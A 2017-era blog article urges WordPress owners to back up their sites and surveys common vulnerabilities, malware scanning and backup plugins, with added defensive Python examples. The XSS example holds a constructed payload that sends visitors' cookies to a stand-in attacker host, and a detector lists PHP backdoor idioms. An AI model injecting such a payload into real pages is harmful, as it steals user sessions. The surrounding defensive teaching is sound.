2017 promises to be fulfilling. But I have a few questions for you:
- Is your website safe from hackers?
- What about technical issues like a server crash?
- How do you plan to restore your site if you lose your data?
If you manage or own a WordPress website or blog that is not backed up, you are at risk of losing everything. Yes, everything.
Imagine you wake up one morning to an email from your hosting company saying that their server crashed due to 'technical issues', and you realize that your website and everything on it is gone.
The hosting company 'apologizes for the inconvenience.'
Sadly, because you never created a backup of your five-year-old blog, you have lost over 1,000 blog posts to a 'technical problem'.
This is, however, just one not-so-hypothetical scenario.
Why you need to back up your WordPress database in 2017
Let's consider a few of the common reasons:
1). To avoid data loss: The most common reason to back up your WordPress database is to avoid data loss, whatever the cause:
- Accidentally deleting files from the server
- Viruses and malware
- Server updates and other technical issues on the host
- Power failures and outages
Crazy Domains, a hosting company, sent this message to their clients one fine morning.
“Due to an unforeseen incident in a storage upgrade the data from your hosting account has unfortunately been irretrievably lost.”
The company offered its customers just $100 in compensation. One of them responded:
“My financial losses due to lost email, productivity, support and the need to rebuild my website will total up to $2000.”
The thing is, when you rely on a hosting company, anything can happen. Even if they back up your website regularly (as Crazy Domains did), the data can still be lost.
The safest approach is to keep your own copy of the backup on a computer you control, so that even if the hosting provider's backups fail, your data is safe.
2). Avoid financial loss: Pat Flynn, the founder of Smart Passive Income, lost as much as $12,000 when his blog went down for an entire week due to server issues. After a week of sleepless nights he finally migrated his blog and other websites to a new host.
A server issue can cause several kinds of financial loss:
- Clients cannot reach your website, so you lose customers in real time.
- You might lose customer records or even your entire mailing lists.
- Customer accounts on your website can be wiped out completely, costing you serious money in the long run.
3). Technical non-server issues: A denial of service (DoS) attack is a cyber attack in which the attacker makes a resource unavailable to its intended users. Your website can be the target of a DoS attack, which stops your users from reaching it.
This is what happened to Distribute.IT, one of Australia's leading domain name sellers.
A DoS attacker targeted them and their server went offline every few seconds. The attacker then destroyed their servers and they started losing customers. Carl Woerndle said:
“My brother and I knew at this point that our business was gone.”
It took the company almost a year to recover from the incident.
Imagine the same happening to your WordPress site. If you have a backup, you can quickly move your website to a new server and leave the attacker to do whatever they want with the old one.
WordPress sites are also prone to data loss through compromise. Let's consider some of the common vulnerabilities.
Eight WordPress vulnerabilities
WordPress is the most widely used CMS. It has about 65% of the CMS market and powers around 25% of all websites and blogs worldwide.
Due to its popularity, a large number of WordPress websites get compromised. In the first quarter of 2016, 78% of the hacked websites Sucuri analyzed were running WordPress.
If you use WordPress, make sure your site is not exposed through any of the weaknesses below.
Wordfence published a report on how hacked WordPress sites were compromised; the image below shows the breakdown. To make your website harder to compromise, focus on the following factors:
- Brute force
- File permissions
- File upload
- Cross-Site Scripting (XSS)
Let's discuss these vulnerabilities individually and see how you can protect your WordPress website.
1). WordPress plugins
Plugins are the backbone of WordPress. There are more than 43K plugins available for download. They are add-ons written in PHP that let you add features to your WordPress website.
Because they are so widely used, a plugin is often the easiest way for an attacker into your website. Plugins account for 56% of all WordPress vulnerabilities.
You have to be extremely careful when downloading a new plugin.
Sucuri reported that 25% of the WordPress websites compromised in the first quarter of 2016 through a plugin had one of these three plugins installed:
- Gravity Forms
Though these three plugins have since been fixed, there are thousands of other plugins that can threaten your website's security.
Here are a few tips to keep your website protected from plugin vulnerabilities:
- Update plugins whenever an update is available. Developers fix vulnerabilities when they find them and ship an update; if you don't install it, you are still running the vulnerable version. For instance, the Gravity Forms arbitrary file upload vulnerability was fixed in a later release, but anyone who hasn't updated is still running the vulnerable plugin.
- Download plugins from reputable sources. The best place is the official WordPress plugin repository. Refrain from downloading plugins from unknown websites.
- Do not install a plugin that has not been updated in six months or more. That usually means the plugin has been abandoned and the developer is no longer working on it. Such abandoned plugins stay in the repository, and they are among the biggest threats to your website.
- A quick Google search will show you how good or bad a plugin's track record is. For instance, if you are interested in Contact Form 7, search for 'contact form 7 vulnerability' to see whether it has ever put webmasters at risk.
2). Brute force
A brute force attack is a technique for guessing the username and/or password of your website. The attacker uses software to try many combinations until one works.
Brute force attacks account for 16% of the WordPress compromises in the figures cited above.
Sucuri published a report on the number of login attempts it tracks and stops on the websites it protects. The figures are staggering.
Several million brute force attempts are tracked in a single day, and remember, that is only on the websites Sucuri protects. There are millions of other WordPress sites that aren't.
Wordfence recently reported a massive increase in the number of brute force attacks on the websites it tracks.
They also tracked the IP address, number of attacks, host name, and other information about the attackers.
The first step is to stop using 'admin' as the username, since that hands an attacker half of the credential for free.
Other security measures you can take include:
- Use strong, unique passwords.
- Change your password periodically, and immediately after any suspected compromise.
- Enable two-factor authentication for WordPress.
- Limit login attempts, so that an IP address is rate-limited or locked out after a few failures.
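Brute force attempts show up in the web server's access log long before a plugin tells you about them: a failed WordPress login to wp-login.php returns HTTP 200 (the form is re-rendered), a successful one returns a 302 redirect, and xmlrpc.php is hit the same way by multicall attacks. The detector below is an added example, not part of the original article or of any plugin it names; the log lines are constructed for the demo, and the threshold and window are assumptions you would tune for your own traffic.

```python
# Added example (not from the original article): spot wp-login.php / xmlrpc.php
# brute force in a combined-format access log. SAMPLE_LOG is constructed.
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx "combined" log format; timestamp in the Apache default format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")

SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2017:08:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3421
203.0.113.7 - - [10/Jan/2017:08:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3421
203.0.113.7 - - [10/Jan/2017:08:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3421
203.0.113.7 - - [10/Jan/2017:08:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3421
203.0.113.7 - - [10/Jan/2017:08:00:04 +0000] "POST /wp-login.php HTTP/1.1" 200 3421
203.0.113.7 - - [10/Jan/2017:08:00:05 +0000] "POST /wp-login.php HTTP/1.1" 302 0
198.51.100.2 - - [10/Jan/2017:08:10:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0
198.51.100.2 - - [10/Jan/2017:09:15:00 +0000] "GET /wp-admin/ HTTP/1.1" 200 9000
192.0.2.9 - - [10/Jan/2017:08:30:00 +0000] "POST /xmlrpc.php HTTP/1.1" 200 400
192.0.2.9 - - [10/Jan/2017:08:30:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 400
192.0.2.9 - - [10/Jan/2017:08:30:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 400
192.0.2.9 - - [10/Jan/2017:08:30:02 +0000] "POST /xmlrpc.php HTTP/1.1" 200 400
"""


def parse_log(text):
    """Yield (ip, timestamp, method, path, status) for each well-formed line."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        yield (m["ip"], datetime.strptime(m["ts"], TS_FMT),
               m["method"], m["path"], int(m["status"]))


def find_brute_force(log_text, threshold=5, window_seconds=60):
    """Return {ip: {"attempts": n, "success_after_failures": bool}} for every IP
    that POSTed to a login endpoint at least `threshold` times within any
    `window_seconds` span. success_after_failures is True when a 200 (failed
    login form re-render) is directly followed by a 302 (successful login),
    i.e. a guess probably worked; it only means something for wp-login.php,
    since xmlrpc.php answers 200 either way."""
    events = defaultdict(list)
    for ip, ts, method, path, status in parse_log(log_text):
        if method == "POST" and path.split("?")[0] in LOGIN_PATHS:
            events[ip].append((ts, status))

    window = timedelta(seconds=window_seconds)
    flagged = {}
    for ip, hits in events.items():
        hits.sort()
        start, burst = 0, 0
        for end in range(len(hits)):            # sliding window over sorted hits
            while hits[end][0] - hits[start][0] > window:
                start += 1
            burst = max(burst, end - start + 1)
        if burst >= threshold:
            statuses = [s for _, s in hits]
            success = any(a == 200 and b == 302
                          for a, b in zip(statuses, statuses[1:]))
            flagged[ip] = {"attempts": burst, "success_after_failures": success}
    return flagged


if __name__ == "__main__":
    for ip, info in find_brute_force(SAMPLE_LOG).items():
        print(ip, info)
```

Run it against a real log by reading the file into `find_brute_force`; an IP flagged with `success_after_failures` set should be treated as a compromised account, not just a noisy source to block.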
3). WordPress core
WordPress core refers to the files that make up WordPress itself, as opposed to plugins and themes. When you install WordPress, you are installing its core files.
Core files have vulnerabilities too. The chart below shows the most vulnerable core versions: WordPress 3.0 and 3.0.1 were the worst, with 15 known vulnerabilities each.
Here is a list of the latest core vulnerabilities. Keep track of new ones and patch them as soon as possible.
If you don't, you might end up with serious problems on your website.
Keep WordPress updated. As soon as you receive an alert that an update is available, install it. Before you do, create a fresh backup of your website so you can roll back if the update breaks something.
4). WordPress themes
As much as 14% of WordPress vulnerabilities are associated with themes. Whenever you install a new theme, you risk introducing a vulnerable one.
In 2016, Elegant Themes issued a security alert saying that it had found vulnerabilities in a couple of its themes and three of its plugins. Such vulnerabilities let attackers in through the theme, after which they can damage your website, steal information, or do whatever they like, often without you noticing.
Anyone running a theme with such a flaw is at risk, regardless of the size of the website or database.
Keep your themes updated, and if you are not using a theme, remove it. There is no point in keeping it installed.
5). Web hosting
The host you choose plays a significant role in how exposed your website is. As many as 41% of WordPress blogs are hacked because of poor hosting or hosting vulnerabilities.
Any host can be hacked, even the best ones around.
Interestingly, when you approach your hosting company about such an incident, they will most likely deny that anyone got into your website through their infrastructure. This is where things get tough.
Use a reputable host known for security and good customer support, because when your website gets hacked, you need serious help.
Most hosting companies, unfortunately, will blame the customer for the hack.
Stay miles away from cheap hosts. Hosting your website on a cheap host is like building a house on a glacier.
6). File permissions
Your website consists of files and folders on the server (plus a database). Not everyone is allowed to read, write, and execute those files: file permissions control what the owner, the group, and everyone else may do.
Set correctly, these permissions help secure your website; set loosely, they make it vulnerable.
For instance, if WordPress core files and folders can be read, written, and executed by anyone, a potential attacker's life becomes extremely easy.
WordPress recommends 755 for directories and 644 for files (775 is only needed when the web server runs as a different user in the same group and genuinely needs write access), and wp-config.php, which holds your database credentials, should be tighter still, such as 600 or 640. Never use 777.
Wordfence has a nice guide that shows you how to restrict access to files and folders.
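A quick way to find out whether your install actually matches the recommendation above is to walk the tree and report every entry with permission bits wider than it should have (a world-writable uploads directory, a group-readable wp-config.php). The script below is an added example, not from the original article or from Wordfence; it assumes the 755/644/600 modes just discussed and that the files are owned by your own user, and it deliberately only tightens, never loosens.

```python
# Added example (not from the original article): audit a WordPress tree for
# permission bits wider than 755 (dirs) / 644 (files) / 600 (wp-config.php)
# and optionally fix them. Ownership is assumed to be correct already.
import os
import stat

DIR_MODE = 0o755
FILE_MODE = 0o644
SECRET_MODE = 0o600                 # wp-config.php holds the DB credentials
SECRET_FILES = {"wp-config.php"}


def expected_mode(path):
    """The mode an entry should have under the policy above."""
    if os.path.isdir(path):
        return DIR_MODE
    if os.path.basename(path) in SECRET_FILES:
        return SECRET_MODE
    return FILE_MODE


def audit_permissions(root):
    """Return [(relative_path, actual_mode, expected_mode)] for entries that
    carry permission bits the policy does not grant. Only *extra* bits are a
    finding: 0o644 where 0o600 is expected is reported, 0o600 where 0o644 is
    expected is not (tighter than recommended is not a security problem)."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        entries = [dirpath] + [os.path.join(dirpath, f) for f in filenames]
        for path in entries:
            if os.path.islink(path):            # symlinks carry no mode of their own
                continue
            actual = stat.S_IMODE(os.lstat(path).st_mode)
            want = expected_mode(path)
            if actual & ~want:
                findings.append((os.path.relpath(path, root), actual, want))
    return findings


def fix_permissions(root):
    """chmod every flagged entry to its expected mode; return the count changed."""
    findings = audit_permissions(root)
    for rel, _actual, want in findings:
        os.chmod(os.path.join(root, rel), want)
    return len(findings)


if __name__ == "__main__":
    import sys
    for rel, actual, want in audit_permissions(sys.argv[1]):
        print(f"{rel}: {oct(actual)} (expected {oct(want)})")
```

Run `audit_permissions` first and read the findings before calling `fix_permissions`: on hosts where PHP runs as a different user than the file owner, a directory that WordPress must write to (uploads, cache) may legitimately need the group-write bit, and you should set that exception consciously rather than have a script silently break uploads.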
7). File upload
Wordfence analyzed 1,600 hacked WordPress websites over 14 months and found that file upload is the third most common way in. Around 10% of the websites were hacked through file uploads.
In its simplest form, a file upload vulnerability lets a visitor place a file of their choosing on your server, either by uploading it directly through a form or by handing your site a URL that it then fetches and saves without checking what it received. If that file is a PHP script and lands in a web-accessible directory, the attacker can run it just by requesting it.
This is exactly what happened with the TimThumb vulnerability. Anyone could pass an image URL in the query string; timthumb.php fetched the file and saved it to its cache directory without validating its contents, so a PHP file disguised as an image could be cached and then executed.
Here are a few ways to avoid file upload vulnerabilities:
- Make all uploaded files non-executable, and store them in a directory where the web server will not run scripts.
- Only accept uploads from authenticated users.
- Only accept specific file extensions, and never trust the file name the client supplies.
- Validate both the extension and the actual content of the file before saving it, and do the same for files fetched from a URL.
8). Cross-Site Scripting (XSS)
It is a type of vulnerability in which an attacker injects a script into a web page that other users then view. The victim's browser renders the page and executes the script as if it came from your site.
The following two guides will help you secure your WordPress website from XSS attacks:
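The root cause in almost every WordPress XSS advisory is the same: user-supplied text (a comment, a search term, a plugin setting) is written into the page without being encoded for the context it lands in. The pair of functions below shows the vulnerable pattern next to the hardened one. This is an added example, not from the article or the guides it mentions; the comment widget and the payloads are constructed for the demo.

```python
# Added example (not from the original article): the same comment widget
# rendered without escaping (vulnerable) and with escaping (hardened).
from html import escape

# Constructed payloads: one for the text context, one that tries to break out
# of a quoted attribute.
PAYLOAD_BODY = '<script>document.location="https://attacker.example/?c="+document.cookie</script>'
PAYLOAD_ATTR = 'x" onmouseover="alert(1)'


def render_comment_vulnerable(author, body):
    # Stored strings go straight into the markup, so the browser runs them.
    return f'<div class="comment" data-author="{author}"><p>{body}</p></div>'


def render_comment_safe(author, body):
    # escape(quote=True) encodes < > & for the text node and " ' for the
    # attribute value. This covers the HTML-body and quoted-attribute contexts
    # only; text placed inside a <script> block or a URL needs its own encoder.
    return (f'<div class="comment" data-author="{escape(author, quote=True)}">'
            f'<p>{escape(body, quote=True)}</p></div>')


if __name__ == "__main__":
    print(render_comment_vulnerable("bob", PAYLOAD_BODY))
    print(render_comment_safe("bob", PAYLOAD_BODY))
    print(render_comment_safe(PAYLOAD_ATTR, "hi"))
```

In WordPress plugin code the equivalents are esc_html(), esc_attr(), esc_url() and esc_js(), one per output context; a single "sanitize on input" pass is not a substitute, because the same string may be printed into several contexts.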
How to scan WordPress website for malware
Knowing about WordPress vulnerabilities isn't enough. If you cannot scan your website for malware and detect compromises, you cannot protect it.
It is time to scan your WordPress website for malware.
There are three ways to do it:
- Use a plugin
- Use a website scanner tool
- Do it manually
i). Use a plugin
The easiest way to scan your website for malware is to use a security plugin that comes with a scanning feature. The most used malware detection plugin is Wordfence Security plugin.
It comes with several features such as firewall, scanning, blocking, monitoring, and several others. It scans your entire website for malware.
It compares the core files, themes, and plugins on your server with the copies in the WordPress repository and reports any difference. Every such change is flagged, so you can tell whether you made it or someone else did.
It scans for known malware (over 44K signatures) and backdoors. It is a must-have plugin for WordPress websites.
Sucuri Security is another well-known plugin that scans your website for malicious code and malware. It keeps track of all changes to your website, which you can review to detect malware.
ii). Use a website checker tool
Online checker tools make things easier: you can run a free scan to look for malware. There are several tools (free and premium), and one of the best known is Sucuri SiteCheck.
The paid platform costs $16.66 a month to scan your website and protect it from malware, brute force attacks, and other common attacks.
Using the free scan tool is easy. You just enter the URL and click 'scan website'.
It takes a few minutes to scan your website completely, and the free scan shows you the results immediately.
The free scan gives you an overview of your website's current standing. You can subscribe to the monthly plan for regular scanning.
iii). Manual detection
Detecting malware manually is harder and more technical, and not for everyone. It means reading through the WordPress files and code yourself, so if you are not comfortable with PHP and the WordPress file layout, it is not the method for you.
The idea is to look for anything that differs from the original files: core, themes, and plugins. Those familiar with PHP can read the code and spot what doesn't belong; those who are not can compare the files against the originals in the WordPress repository.
Clearly, this is a time-consuming technique.
But there are still people who prefer to hunt for malware manually. Scanning tools can miss things or misreport, but a careful manual review leaves no stone unturned.
Warning: Don’t go for manual scanning if you’re not sure what you’re doing.
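The comparison described above can be automated so that the manual part is reduced to reading the handful of files that actually changed. The script below hashes every file in an install, diffs the result against a manifest taken from a known-good copy (a fresh download of the same core version, or your own last verified backup), and greps any new or modified PHP file for the obfuscation idioms that injected backdoors almost always use. It is an added example, not from the article or from Wordfence or Sucuri; the pattern list is a starting point, not a signature database, and the install tree in the test is constructed.

```python
# Added example (not from the original article): hash a WordPress tree, diff
# it against a known-good manifest, and flag new/changed PHP files that
# contain common backdoor idioms.
import hashlib
import os
import re

# Obfuscation idioms typical of injected PHP backdoors (constructed list).
SUSPICIOUS = re.compile(
    rb"(eval\s*\(\s*(base64_decode|gzinflate|str_rot13|gzuncompress)"
    rb"|preg_replace\s*\([^)]*/e[\'\"]"                 # /e modifier executes the replacement
    rb"|\$_(GET|POST|REQUEST|COOKIE)\[[^\]]+\]\s*\()",  # calling a value taken from the request
    re.IGNORECASE,
)


def hash_tree(root):
    """{relative path: sha256 hex} for every regular file under root."""
    manifest = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue
            h = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            manifest[os.path.relpath(path, root)] = h.hexdigest()
    return manifest


def compare_to_manifest(root, known_good):
    """Return {'added', 'modified', 'missing', 'suspicious'} as sorted lists.
    'suspicious' holds the added or modified *.php files whose contents match
    SUSPICIOUS; those are the ones to read first."""
    current = hash_tree(root)
    added = sorted(set(current) - set(known_good))
    missing = sorted(set(known_good) - set(current))
    modified = sorted(p for p in current.keys() & known_good.keys()
                      if current[p] != known_good[p])
    suspicious = []
    for rel in added + modified:
        if rel.lower().endswith(".php"):
            with open(os.path.join(root, rel), "rb") as fh:
                if SUSPICIOUS.search(fh.read()):
                    suspicious.append(rel)
    return {"added": added, "modified": modified, "missing": missing,
            "suspicious": sorted(suspicious)}


if __name__ == "__main__":
    import json, sys
    # usage: script.py <clean-reference-tree> <live-tree>
    report = compare_to_manifest(sys.argv[2], hash_tree(sys.argv[1]))
    print(json.dumps(report, indent=2))
```

Two caveats a real run needs: wp-content/uploads and wp-config.php will legitimately differ from any reference tree, so keep a separate baseline for them, and a PHP file appearing under uploads at all is itself a finding, whatever it contains.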
WordPress backup and restore plugins and software
Let’s come to the point.
The whole idea is to back up your website so that if something goes wrong, you can restore it quickly without losing customers and money.
Here is a list of some of the best WordPress backup and restore tools and plugins.
a). UpdraftPlus
It is a simple plugin with an easy-to-use interface. You can create backups manually or schedule them, and store them in the cloud: it supports S3, Google Drive, Dropbox, FTP, OneDrive, and many other services. You can back up everything from plugins to themes to uploads.
Above all, UpdraftPlus is a free plugin. You can enjoy all these features with the free version.
The premium version adds a whole lot of other add-ons such as encryption, site cloning, and several others.
b). VaultPress
VaultPress has 30K active installs and a 4.4 rating. Quite impressive, but since it is not free, a good chunk of webmasters cannot use it, even if they desperately wish to.
It allows quick backups and restoration. You can put everything on autopilot. With their scheduler, backups will be created automatically.
Besides backups, VaultPress fixes vulnerabilities as well. It comes with a scanning feature that detects and fixes malware. This ensures that your backups are free from all types of malware.
c). BackupBuddy
It is a premium plugin developed by iThemes. Unlike most premium backup plugins, it doesn't charge monthly: it is sold as a yearly subscription, but you can also pay a one-time fee and keep the plugin for life.
BackupBuddy creates a full backup of your entire website on complete autopilot. The backups can be stored on cloud services like Stash, S3, Google Drive, and others. You get 1GB of free space for Stash, which is quite enough for a single blog.
Some other exclusive features include:
- Malware scanning
- Ability to exclude certain files
- Database repair
- Storage limits
- URL replacement
- Change host without downtime
d). Duplicator
It is primarily a cloning plugin that helps move WordPress websites from one host to another smoothly, but it is widely used for backup and restoration too.
Duplicator has over 900K active installs and a 4.9 rating; only 16 users rated it one star. It is clearly an excellent plugin and best suited to small-scale users.
You can create auto-backups, migrate, and store backups on the cloud. It supports all the leading cloud storage services including Google Drive, S3, Dropbox, and several others.
You can use the free version with basic features or switch to Duplicator Pro to get access to all of them.
Migrating your website or changing the host becomes a piece of cake with it. It can do it without any downtime.
e). BackUp WordPress
BackUp WordPress supports scheduling and cloud storage. With the free version, you can store the backup on your computer or have it sent to you by email. To get access to all the features, you have to buy it.
Some other interesting features include:
- It works with shared hosting. This is what makes it a perfect backup plugin for beginners.
- Works on Windows and Linux servers.
- The plugin interface can be translated into several other languages like Spanish, German, Dutch, etc.
- It supports multiple backup schedules.
f). BackWPup
BackWPup supports scheduling, storing backups in the cloud, checking, repairing, and optimizing the database, choosing which files to back up, and, importantly, creating backups in several formats (for example for email).
It supports a whole lot of cloud services including Google Drive, Dropbox, S3, SugarSync, RackSpace, and others. Did I mention you get these services for free?
The pro package comes with additional features that make it even better.
g). WordPress Backup to Dropbox
It is a completely free backup plugin that syncs backups to Dropbox only. Unfortunately, it has no restore feature, but you can restore the backup file through the WordPress Import feature.
WordPress Backup to Dropbox is a perfect plugin for businesses that use Dropbox as their primary cloud service. Instead of installing other plugins with a whole lot of features you do not intend to use, install this tiny plugin; it will reduce the load on your server.
It supports scheduling and is available in multiple languages including Arabic, Spanish, French, Chinese, Russian, and several others.
h). WP-DB-Backup
With over 400K active installs and a 4.6 rating, this is the simplest backup and restoration plugin in town.
WP-DB-Backup only backs up the WordPress database. It will not back up any media files (such as images), so it is best suited to websites that only post text (such as PBNs) or with minimal media. You have to back up media files separately.
You can create backups and restore your database with a few clicks, and it has a scheduling feature.
WP-DB-Backup is probably best for small websites that are not updated very often.
i). BlogVault
BlogVault is a decent choice for WordPress websites that want to back up to Dropbox without using local storage. The plugin doesn't consume local storage, so it doesn't consume your website's resources.
BlogVault has over 20K installs and a 4.3 star rating. It handles backups, restores, website migration, real-time backups, incremental backups, and encryption.
One of its most prominent and unique features is the test restore. It lets you restore a backup to a test environment, check that it works properly, and only then restore it for real; if it doesn't work, you can try another backup. This is extremely handy for keeping your website live all the time.
Some other features include:
- 30-day backup history
- All backups are encrypted, keeping your data safe
- Simple restoration
- Real-time backup ensures that you do not lose any data: everything is copied to Dropbox as it changes
j). CYAN Backup
It is a clean and simple WordPress backup plugin that can create backups hourly, so you can back up your website several times a day. This makes it a good fit for websites that are updated several times a day.
CYAN Backup has a schedule option but doesn't support cloud storage. It does, however, support remote storage over FTP and FTPS.
If you have a small website that is updated daily or several times a day, this plugin is worth considering. Its one drawback is that it offers no restore function.
Simple backup rules
Before you back up a WordPress website, make sure you follow these rules:
- Keep three copies of your backup in different locations, as the WordPress Codex suggests. Backup files can be corrupted or lost, so for safety, store them in more than one place.
- Exclude files you do not need from the backup. There is no point backing up plugins and themes you do not intend to use; remove unused files, folders, plugins, and themes instead.
- Once a month, create a manual backup of your entire website. A scheduled job can silently fail, so do not trust automated backups blindly.
- Check the backup file once a month to see that it really contains what you need, and test restoring it as well. A backup you have never restored is not a backup you can rely on.
- Back up your website before upgrading WordPress or before making major changes to your blog.
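The "check the backup file" rule is only meaningful if the check is mechanical: record a checksum when the archive is written, and later verify both the checksum and that the archive still opens and contains the database dump. The script below does exactly that for a site directory plus a SQL dump you hand it as bytes. It is an added example, not from the article or any of the plugins above; the excluded directory names are an assumption, the SQL dump in the test is constructed, and in practice you would obtain it from mysqldump and copy the archive and its manifest to the off-site locations the first rule asks for.

```python
# Added example (not from the original article): create a site+database
# backup archive with a SHA-256 manifest, and verify it later.
import hashlib
import io
import json
import os
import tarfile
import time

EXCLUDED_DIRS = ("cache", "node_modules")   # assumption: never worth backing up


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def create_backup(site_dir, sql_dump_bytes, out_dir, exclude_dirs=EXCLUDED_DIRS):
    """Write <out_dir>/site-<utc timestamp>.tar.gz holding the site tree (as
    'site/', minus excluded directory names) plus database.sql, and a JSON
    manifest with the archive's SHA-256 next to it. Returns (archive, manifest)."""
    ts = time.strftime("%Y%m%d-%H%M%S", time.gmtime())
    archive = os.path.join(out_dir, f"site-{ts}.tar.gz")

    def skip_excluded(member):
        return None if any(p in exclude_dirs for p in member.name.split("/")) else member

    with tarfile.open(archive, "w:gz") as tar:
        tar.add(site_dir, arcname="site", filter=skip_excluded)
        info = tarfile.TarInfo("database.sql")
        info.size = len(sql_dump_bytes)
        info.mtime = int(time.time())
        tar.addfile(info, io.BytesIO(sql_dump_bytes))

    manifest = archive + ".sha256"
    with open(manifest, "w") as fh:
        json.dump({"archive": os.path.basename(archive),
                   "sha256": sha256_file(archive)}, fh)
    return archive, manifest


def verify_backup(archive, manifest):
    """Return (ok, detail). Fails on a checksum mismatch (corruption or
    tampering), on an archive that cannot be read to the end, and on an
    archive that is missing the database dump."""
    with open(manifest) as fh:
        expected = json.load(fh)["sha256"]
    if sha256_file(archive) != expected:
        return False, "checksum mismatch (corrupted or tampered)"
    try:
        with tarfile.open(archive, "r:gz") as tar:
            names = tar.getnames()          # reads every header, so truncation shows up here
    except (tarfile.TarError, OSError, EOFError) as exc:
        return False, f"unreadable archive: {exc}"
    if "database.sql" not in names:
        return False, "no database dump in archive"
    return True, f"{len(names)} entries"


if __name__ == "__main__":
    import sys
    # usage: script.py verify <archive> <manifest>
    print(verify_backup(sys.argv[2], sys.argv[3]))
```

A checksum proves the bytes are intact, not that the contents are usable: the monthly test restore into a scratch site is still the only check that catches a dump taken mid-migration or an archive missing wp-content/uploads.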
Time spent on backups is never wasted. You will never regret it, and it will pay off on the bad day.
The safety of your website is in your own hands. Scan your website for malware first, and only once it is clean create the backup. Backing up a site that already contains malware just preserves the infection.